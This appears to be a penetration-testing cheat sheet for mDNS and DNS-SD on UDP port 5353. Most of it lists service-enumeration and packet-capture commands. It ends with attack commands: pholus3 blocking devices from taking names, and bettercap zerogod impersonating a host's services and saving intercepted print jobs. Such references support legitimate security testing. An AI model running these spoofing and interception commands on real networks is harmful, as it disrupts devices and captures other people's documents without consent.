Multicast DNS (mDNS) and DNS-SD - PORT 5353/UDP
Last updated
PORT STATE SERVICE
5353/udp open zeroconfnmap -sU -p 5353 --script=dns-service-discovery <target>sudo nmap --script=broadcast-dns-service-discovery # List service types
avahi-browse -bt _services._dns-sd._udp
# Browse all services and resolve to host/port
avahi-browse -art# Browse all HTTP services
dns-sd -B _http._tcp
# Enumerate service types
dns-sd -B _services._dns-sd._udp
# Resolve a specific instance
dns-sd -L "My Printer" _ipp._tcp local# Live capture
sudo tshark -i eth0 -f "udp port 5353" -Y mdns
# Only DNS-SD service list queries
sudo tshark -i eth0 -f "udp port 5353" -Y "dns.qry.name == \"_services._dns-sd._udp.local\""# Block new devices from taking names
sudo python3 pholus3.py eth0 -afre -stimeout 1000# Discover services
sudo bettercap -iface eth0 -eval "zerogod.discovery on"
# Impersonate all services of a host
zerogod.impersonate 192.168.1.42
# Save intercepted print jobs
set zerogod.ipp.save_path ~/.bettercap/zerogod/documents/
zerogod.impersonate 192.168.1.42